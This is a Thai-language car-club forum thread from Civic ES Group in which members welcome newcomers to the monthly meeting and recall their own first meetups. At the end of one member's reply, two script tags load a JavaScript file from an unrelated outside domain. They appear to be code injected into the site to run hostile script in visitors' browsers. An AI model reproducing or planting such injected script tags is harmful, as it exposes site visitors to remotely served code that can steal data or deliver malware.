หน้าตาก็ดี จิตใจก็ดี ทำบุญด้วยเบียร์ รึ เหล้า เน้อพี่ฟาน
ได้รับคำขอบคุณจาก: kunshybeer08  ~ สเตฟาน ~  V_ES  hacker  carrimoroll  cacalot  Junnee  civic753  Gremlin  cherd  karnmotocross01  Jitrada 
nat

เข้าร่วม: 11 สิงหา 2009
ตอบ: 119

ได้รับคำขอบคุณ: 264
ให้คำขอบคุณ: 269

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 16 พฤศจิกา 2009 17:31 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ชักอยากไปแล้วสิ ???????
ได้รับคำขอบคุณจาก: kunshybeer08  ~ สเตฟาน ~  hacker  ahingrace  carrimoroll  cacalot  civic753  bank01  cherd  karnmotocross01  Jitrada 
kunshybeer08

ตอบ: 914

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1063
ให้คำขอบคุณ: 1702

จันทร์, 16 พฤศจิกา 2009 17:35 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ประทับใจมากครับพี่ อ่านแล้วเข้าถึงเลย......
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  CEMENT  Wal2n_ES  hacker  carrimoroll  cacalot  civic753  cherd  karnmotocross01  Jitrada 
wut-chiangmai

ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 16 พฤศจิกา 2009 17:49 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
อ่านแล้วอยากไปเลยอะครับพี่
ขอบคุณสำหรับเรื่องราวและประสบการณ์ครับ

แก้ไขล่าสุดโดย เมื่อ เสาร์, 11 กันยา 2010 10:22, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  hacker  cacalot  civic753  cherd  karnmotocross01  Jitrada 
K@Tai

เข้าร่วม: 03 ตุลา 2008
ตอบ: 234

ได้รับคำขอบคุณ: 218
ให้คำขอบคุณ: 114

จันทร์, 16 พฤศจิกา 2009 18:01 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
ยังจำวันแรกที่เจอกันที่โรงเบียร์ได้เลย

จากวันนั้น ถึงวันนี้ หนุ่มขี้อาย กลายเป็นดาราไปเสียแร๊ะ

น้อง ๆ สมาชิกใหม่ ไม่ต้องกลัว ไม่ต้องอาย ยิ้ม ๆ ๆ ทักทายพี่ ๆ ได้ทุกคน

อย่างที่น้องฟานบอก มามิ๊ตติ้ง ไม่ยากอย่างที่คิด เลย นะค่ะ ~*
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  CEMENT  iMan  TUI_PeTiTe  hacker  ahingrace  carrimoroll  khing_cr  cacalot  civic753  cherd  nujen0_0  karnmotocross01  Jitrada 
Jeab22

ชื่อเล่น: เจี๊ยบ

เข้าร่วม: 14 มกรา 2009
ตอบ: 1724

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1690
ให้คำขอบคุณ: 3102

สี: แดง แรลไล (R-513)
จันทร์, 16 พฤศจิกา 2009 18:06 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
อ่านแล้วรัก CIVIC ES GROUP ขึ้นอีกเป็นกองครับ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  hacker  ahingrace  carrimoroll  cacalot  cherd  kokasat  karnmotocross01 
sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
จันทร์, 16 พฤศจิกา 2009 18:09 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
พี่สเตฟานเจอกันแน่ครับ21นี้
แต่ว่าพี่เมื่อยไหมเห็นพิมพ์เยอะเลย :D :D :
D
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  Wal2n_ES  hacker  carrimoroll  cacalot  civic753  cherd  Jitrada 
black_boy

ชื่อเล่น: โบ๊ต

ตอบ: 2031

นายทะเบียน
นายทะเบียน

ได้รับคำขอบคุณ: 1969
ให้คำขอบคุณ: 706

จันทร์, 16 พฤศจิกา 2009 18:12 - ~~ สำหรับสมาชิกใหม่ มา Meeting ทุกเสาร์ที่3ของเดือน..ไม่ยากอย่างที่คิด ~~
จำบรรยากาศครั้งแรกได้เลย

เพื่อนใหม่ที่จะไปครั้งแรกไม่ต้องกลัวนะครับเรียนเชิญ

ปล.เดวนี้ผมก็ไม่ค่อยได้ไปเท่ารัยส่วนใหญ่จะนอกรอบซะมากกว่า "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  Wal2n_ES  hacker  carrimoroll  cacalot  civic753  cherd  davidian  หยวน  karnmotocross01  Jitrada 
ตอบ
หน้า 1 จาก 14
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.